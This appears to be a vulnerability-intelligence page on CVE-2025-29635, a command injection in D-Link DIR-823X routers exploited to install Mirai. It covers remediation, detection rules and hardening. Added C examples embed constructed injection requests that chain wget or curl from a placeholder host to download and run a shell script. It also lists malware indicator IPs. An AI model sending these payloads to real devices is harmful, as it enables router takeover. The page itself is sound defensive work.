Planned Fix

CVE-2025-29635

Command Injection in D-Link DIR-823X

Summary

The vulnerability affects the D-Link DIR-823X router’s web management interface, specifically the /goform/set_prohibiting CGI handler. A crafted POST request can inject shell metacharacters into a field that is later passed into a system() call, leading to arbitrary command execution on the device. Public proof-of-concept code exists, and Akamai reported active exploitation in the wild that installs Mirai-style malware.

Why Planned Fix? (5 of 6 conditions met)

  • Authentication required
  • Mixed internet / internal deployment
  • No user interaction needed
  • Exploitable in default configuration
  • Active exploitation in the wild
  • High impact vulnerability

Exploitation Details

Type: Command Injection
Exploitable with default configuration: Yes
Authentication needed: Yes
PoC / Exploit: Yes
Impact: Execute arbitrary commands on the router as administrator/root (Full System Compromise)
Exploitation Requirements:
  • Authentication required
Exploitation Process

An authenticated attacker (the listed endpoints /login.html and /goform/login are where the session is obtained) sends a crafted HTTP POST request to /goform/set_prohibiting and places shell metacharacters or a chained command in the vulnerable form field. The router's request parser copies that input, unvalidated, into a command string and invokes it through system(), so the attacker's payload runs on the device with the web server's privileges (administrator/root, per the impact above). In observed attacks, the command chain downloads a shell script and uses it to deploy Mirai malware.
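The handler pattern described above, as an added example that is not D-Link's code or the page's own: a C function that builds the command the vulnerable way, next to a hardened version that allowlists the value and hands it to the program as a single argv element so no shell parses it. The field name mac, the iptables command, and the payload string are assumptions made for illustration; 203.0.113.7 is a documentation address.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed payload of the kind described above: a well-formed value
 * followed by a ';'-chained download-and-run stage. 203.0.113.7 is a
 * documentation address, not a real download host. */
#define DEMO_PAYLOAD "00:11:22:33:44:55; wget http://203.0.113.7/x.sh -O /tmp/x.sh; sh /tmp/x.sh"

/* Vulnerable pattern (assumed shape, not D-Link's code): the form value is
 * interpolated into a shell command line. The real handler would then call
 * system(cmd); here the string is only built so it can be inspected. */
int build_cmd_vulnerable(const char *mac, char *cmd, size_t cap)
{
    int n = snprintf(cmd, cap,
                     "iptables -I FORWARD -m mac --mac-source %s -j DROP", mac);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* Allowlist for the only shape the field should ever have: 17 characters,
 * hex pairs separated by ':'. Anything else, including every shell
 * metacharacter, is rejected before any command is considered. */
int is_valid_mac(const char *s)
{
    if (strlen(s) != 17) return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':') return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/* Hardened pattern: validate, then build an argv for fork()+execv() so the
 * value travels as one argument and no shell ever sees it. argv needs room
 * for 10 pointers (9 arguments plus the NULL terminator). */
int build_cmd_hardened(const char *mac, const char *argv[], size_t argv_cap)
{
    static const char *tmpl[] = {"/usr/sbin/iptables", "-I", "FORWARD", "-m",
                                 "mac", "--mac-source", NULL /* mac */, "-j", "DROP"};
    size_t n = sizeof tmpl / sizeof tmpl[0];
    if (argv_cap < n + 1 || !is_valid_mac(mac)) return -1;
    for (size_t i = 0; i < n; i++) argv[i] = tmpl[i] ? tmpl[i] : mac;
    argv[n] = NULL;
    return 0;
}

int main(void)
{
    char cmd[256];
    const char *argv[10];

    build_cmd_vulnerable(DEMO_PAYLOAD, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);

    if (build_cmd_hardened(DEMO_PAYLOAD, argv, 10) < 0)
        printf("hardened handler rejected the payload\n");
    if (build_cmd_hardened("00:11:22:33:44:55", argv, 10) == 0)
        printf("hardened handler accepted a well-formed MAC: argv[6]=%s\n", argv[6]);
    return 0;
}
```

The allowlist alone would already stop this payload, but the argv form is what removes the bug class: even a value that slips past validation can no longer be interpreted by a shell, because there is none. A denylist of metacharacters is the weaker choice here, since it has to anticipate every quoting and encoding trick the shell accepts.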

Detection Resources

Manual Detection: 0
Script Detection: 0
Scanner Detection: 0

Affected Software

Vendor: D-Link
Product: DIR-823X AX3000 Dual-Band Gigabit Wireless Router
Affected Versions: firmware 240126 and 240802
Description

A consumer/SMB wireless router that provides wired and wireless network access plus web-based administration.

Deployment: Mixed (internet/internal) | Protocol: HTTP | Ports: 80

Affected Component: Web management CGI handler for the set_prohibiting function, where user-supplied form data is passed into a system command.

Affected Endpoints (3):
1. /goform/set_prohibiting
2. /goform/login
3. /login.html
Enterprise Usage: estimated likelihood that this vendor/product is deployed in enterprise environments, on a scale from Very Low to Very High (AI-generated estimate based on market presence, product type and adoption signals, not exact data).
Vendor Size: Medium
Vendor Notifications
Not available
Remediation
Workaround

Retire and replace DIR-823X devices; if temporary use is unavoidable, restrict access to the web admin interface to trusted networks and limit exposure of the router management plane.

Reference: supportannouncement.us.dlink.com
Patch: Not available

Update: Not available

Threat Intelligence
EPSS Score: 1.3% (probability of exploitation in the next 30 days)

EPSS Percentile: 79% (worse than 79% of all CVEs)

CISA KEV: Listed

Active Exploitation: Active (source: akamai.com)
Threat Actors

No known threat actors

Detection Rules (2)

Snort (Snort 3 syntax):
alert http any any -> $HOME_NET any (msg:"CVE-2025-29635 D-Link DIR-823X command injection"; http_method; content:"POST"; http_uri; content:"/goform/set_prohibiting"; http_client_body; content:"wget"; sid:2963535; rev:1;)

Yara:
Mirai_Malware_IOCs_1: detects samples containing "segmentation fault (core dumped)", "AI.NEEDS.TO.DIE", 88.214.20.14, or 64.89.161.130
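To show what the Snort rule above does and does not match, an added C example (not part of the page's rule set or any vendor's code) re-implements the rule's three conditions, runs them over constructed requests, and adds a broader check keyed on shell metacharacters in the form-decoded body rather than on the downloader name. The form field mac, the Host value and the IP 203.0.113.7 are assumptions; the requests are constructed samples, not captured traffic.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TARGET_URI "/goform/set_prohibiting"

/* Constructed samples (field name "mac" and addresses are assumed). */
#define REQ_WGET "POST /goform/set_prohibiting HTTP/1.1\r\nHost: 192.168.0.1\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
    "mac=00:11:22:33:44:55;wget+http://203.0.113.7/x.sh+-O+/tmp/x;sh+/tmp/x"
#define REQ_CURL "POST /goform/set_prohibiting HTTP/1.1\r\nHost: 192.168.0.1\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
    "mac=00:11:22:33:44:55%3Bcurl+http://203.0.113.7/x.sh%7Csh"
#define REQ_BENIGN "POST /goform/set_prohibiting HTTP/1.1\r\nHost: 192.168.0.1\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
    "mac=00:11:22:33:44:55"

/* Locate the request-target and the body in a raw request; 0 if malformed. */
static int split_request(const char *req, const char **uri, size_t *uri_len,
                         const char **body)
{
    const char *sp = strchr(req, ' ');
    const char *sp2 = sp ? strchr(sp + 1, ' ') : NULL;
    const char *sep = strstr(req, "\r\n\r\n");
    if (!sp || !sp2 || !sep || sp2 > sep) return 0;
    *uri = sp + 1;
    *uri_len = (size_t)(sp2 - *uri);
    *body = sep + 4;
    return 1;
}

/* Substring search bounded to the URI, like a Snort content match on http_uri. */
static int uri_contains(const char *uri, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(uri + i, needle, m) == 0) return 1;
    return 0;
}

/* Rule 2963535 as written: POST, URI contains TARGET_URI, body contains "wget". */
int rule_2963535_matches(const char *req)
{
    const char *uri, *body; size_t n;
    if (strncmp(req, "POST ", 5) != 0 || !split_request(req, &uri, &n, &body)) return 0;
    return uri_contains(uri, n, TARGET_URI) && strstr(body, "wget") != NULL;
}

/* Decode application/x-www-form-urlencoded: '+' -> ' ', %XX -> byte. */
static void form_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (; *in && o + 1 < cap; in++) {
        if (*in == '+') {
            out[o++] = ' ';
        } else if (*in == '%' && isxdigit((unsigned char)in[1]) && isxdigit((unsigned char)in[2])) {
            char hex[3] = {in[1], in[2], 0};
            out[o++] = (char)strtol(hex, NULL, 16);
            in += 2;
        } else {
            out[o++] = *in;
        }
    }
    out[o] = '\0';
}

/* Broader check: same method and URI, but flag any shell metacharacter in the
 * decoded body. This catches curl/tftp/busybox variants that the "wget"
 * content match misses, and percent-encoded separators such as %3B. */
int metachar_variant_matches(const char *req)
{
    const char *uri, *body; size_t n;
    if (strncmp(req, "POST ", 5) != 0 || !split_request(req, &uri, &n, &body)) return 0;
    if (!uri_contains(uri, n, TARGET_URI)) return 0;
    char dec[512];
    form_decode(body, dec, sizeof dec);
    return strpbrk(dec, ";|`&$\n") != NULL;
}

int main(void)
{
    const char *samples[] = {REQ_WGET, REQ_CURL, REQ_BENIGN};
    const char *names[] = {"wget chain", "curl chain (encoded)", "benign"};
    for (int i = 0; i < 3; i++)
        printf("%-22s rule 2963535: %d  metachar check: %d\n", names[i],
               rule_2963535_matches(samples[i]), metachar_variant_matches(samples[i]));
    return 0;
}
```

The published rule is tuned to the observed Mirai stager, so it is precise but brittle: any chain that fetches its script with something other than wget is invisible to it. The metacharacter check trades some false positives (a legitimate value containing one of those bytes) for coverage of the injection itself, which is the property that will not change between campaigns.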

NVD Data


Description Summary

A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.

CVSS Base Score: 7.2 (High)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): High
  • User Interaction (UI): None
  • Scope (S): Unchanged
  • Confidentiality (C): High
  • Integrity (I): High
  • Availability (A): High

CWE: CWE-77 Command Injection

Affected Software (CPE) (2)

  • cpe:2.3:o:dlink:dir-823x_firmware:240126:*:*:*:*:*:*:*
  • cpe:2.3:o:dlink:dir-823x_firmware:240802:*:*:*:*:*:*:*

Priority History

Fix Soon: initial analysis
Planned Fix: reassessed to Planned Fix
Emergency Fix: elevated, all critical conditions met
Planned Fix: reassessed to Planned Fix